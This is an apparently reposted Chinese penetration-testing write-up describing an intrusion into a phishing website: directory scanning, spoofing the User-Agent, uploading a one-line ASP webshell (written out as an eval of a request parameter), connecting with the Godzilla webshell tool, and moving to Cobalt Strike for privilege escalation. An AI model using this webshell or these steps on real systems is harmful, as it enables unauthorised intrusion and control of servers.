一、信息合搜集
scandir信息收集
我们利用scandir 对钓鱼网站进行扫描
发现一个文件上传的入口,我们可以利用他进行上传webshell
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/8-1671985880.jpeg "[实战渗透]记某钓鱼网站渗透")
二、哥斯拉webshell
绕UA信息
访问这个网站,发现这个小可爱骗骗还搞个个电脑访问
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/3-1671985881.jpeg "[实战渗透]记某钓鱼网站渗透")
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/8-1671985882.jpeg "[实战渗透]记某钓鱼网站渗透")
利用谷歌自带的工具 修改UA信息
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/7-1671985884.jpeg "[实战渗透]记某钓鱼网站渗透")
可以看到这个是非常一个经典的钓鱼网站,一般人们通过填写个人信息,银行卡钱就无了。
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/9-1671985885.jpeg "[实战渗透]记某钓鱼网站渗透")
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/7-1671985886.jpeg "[实战渗透]记某钓鱼网站渗透")
三、文件上传webshell
编写一句话asp
一句话asp地址
访问我们刚刚发现的 sn.asp ,显而易见这个是一个java写的,我尝试写一个asp马
<%eval request("chopper")%>
文件上传
重命名文件为 asp 后缀文件,然后,上传。
之后访问IP/xx.asp文件
哥斯拉
利用我们的哥斯拉进行连接
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/7-1671985887.jpeg "[实战渗透]记某钓鱼网站渗透")
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/1-1671985889.jpeg "[实战渗透]记某钓鱼网站渗透")
四、CS上线
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/3-1671985890.jpeg "[实战渗透]记某钓鱼网站渗透")
哥斯拉那边运行一下
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/6-1671985891.jpeg "[实战渗透]记某钓鱼网站渗透")
之后就可以像我这样上线提权了
![[实战渗透]记某钓鱼网站渗透](http://cn-sec.com/wp-content/uploads/2022/12/10-1671985892.jpeg "[实战渗透]记某钓鱼网站渗透")
本文作者:keyoldk, 转载请注明来自FreeBuf.COM
原文始发于微信公众号(白帽子程序员):[实战渗透]记某钓鱼网站渗透
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论